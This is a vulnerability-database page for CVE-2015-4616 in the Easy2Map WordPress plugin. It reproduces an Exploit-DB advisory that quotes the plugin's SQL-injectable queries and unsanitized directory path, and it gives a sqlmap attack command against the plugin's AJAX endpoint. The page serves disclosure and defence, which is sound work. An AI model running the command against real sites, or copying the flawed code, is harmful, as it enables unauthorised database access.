VIR Vulnerability Intelligence Relay

CVE-2015-4616

medium
Published 2015-07-08 Β· Modified 2026-05-06
πŸ’¬ Discuss on Community ✚ Propose mitigation
CVSS v3
β€”
CVSS v4 NEW
β€”
not yet in upstream
VIR risk
6.0

Description

Directory traversal vulnerability in includes/MapPinImageSave.php in the Easy2Map plugin before 1.2.5 for WordPress allows remote attackers to create arbitrary files via a .. (dot dot) in the map_id parameter.

Predictions

Exploit likelihood
20%
Patch ETA
β€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or β€” if you've already worked around this in production β€” publish your fix to the community-verified tier.

✚ Propose a mitigation on Community β†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-37534 webapps php text Β· 4 KB
Larry W. Cashdollar Β· 2015-07-08

WordPress Plugin Easy2Map 1.24 - SQL Injection

text exploit Source: Exploit-DB 
Title: SQL Injection in easy2map wordpress plugin v1.24
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.25
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=131
Description: The easiest tool available for creating custom & great-looking Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity.
Vulnerability:
The following lines in Function.php use sprintf() to format queries being sent to the database, this doesn't provide proper sanitization of user input or
properly parameterize the query to the database.

90         $wpdb->query(sprintf("UPDATE $mapsTable
91         SET PolyLines = '%s'
92         WHERE ID = '%s';", $PolyLines, $mapID));

.
.
.
163             $wpdb->query(sprintf("
164                 UPDATE $mapsTable
165                 SET TemplateID = '%s',
166                     MapName = '%s',
167                     Settings = '%s',
168                     LastInvoked = CURRENT_TIMESTAMP,
169                     CSSValues = '%s',
170                     CSSValuesList = '%s',
171                     CSSValuesHeading = '%s',
172                     MapHTML = '%s',
173                     IsActive = 1,
174                     ThemeID = '%s'
175                 WHERE ID = %s;",
176                     $Items['mapTemplateName'],
177                     $Items['mapName'],
178                     urldecode($Items['mapSettingsXML']),
179                     urldecode($Items["mapCSSXML"]),
180                     urldecode($Items["listCSSXML"]),
181                     urldecode($Items["headingCSSXML"]),
182                     urldecode($Items["mapHTML"]),
183                     $Items['mapThemeName'],
184                     $mapID));
185         } else {
186 
187             //this is a map insert
188             if (!$wpdb->query(sprintf("
189             INSERT INTO $mapsTable(
190                 TemplateID,
191                 MapName,
192                 DefaultPinImage,
193                 Settings,
194                 LastInvoked,
195                 PolyLines,
196                 CSSValues,
197                 CSSValuesList,
198                 CSSValuesHeading,
199                 MapHTML,
200                 IsActive,
201                 ThemeID
202             ) VALUES ('%s', '%s', '%s', '%s', 
203                     CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0, '%s');",
204                     $Items['mapTemplateName'],
205                     $Items['mapName'], str_replace('index.php', '', easy2map_get_plugin_url('/index.php')) .     "images/map_pins/pins/111.png",
206                     urldecode($Items['mapSettingsXML']), '',
207                     urldecode($Items["mapCSSXML"]),
208                     urldecode($Items["listCSSXML"]),
209                     urldecode($Items["headingCSSXML"]),
210                     urldecode($Items["mapHTML"]),
211                     $Items['mapThemeName']))) 
.
.
267         $wpdb->query(sprintf("
268             UPDATE $mapsTable
269             SET MapName = '%s',
270             LastInvoked = CURRENT_TIMESTAMP,
271             IsActive = 1
272             WHERE ID = %s;", $mapName, $mapID));

In MapPinImageSave.php, code isn’t sanitized when creating a directory allowing ../ to create files outside of intended directory:

4 $imagesDirectory = WP_CONTENT_DIR . "/uploads/easy2map/images/map_pins/uploaded/" . $_GET["map_id"] . "/";
.
.
11 if (is_uploaded_file($_FILES["pinicon"]['tmp_name'])) {
12 
13     if (!file_exists($imagesDirectory)) {
14         mkdir($imagesDirectory);
15     }

CVEID: 2015-4614 (SQLi) 2015-4616 (../ bug)
OSVDB:

Exploit Code:

  β€’ $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3

Application impact
VendorProductVersionsFixed
easy2map_projecteasy2map{"endIncluding":"1.2.4"}

References

CWEs

CWE-22

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.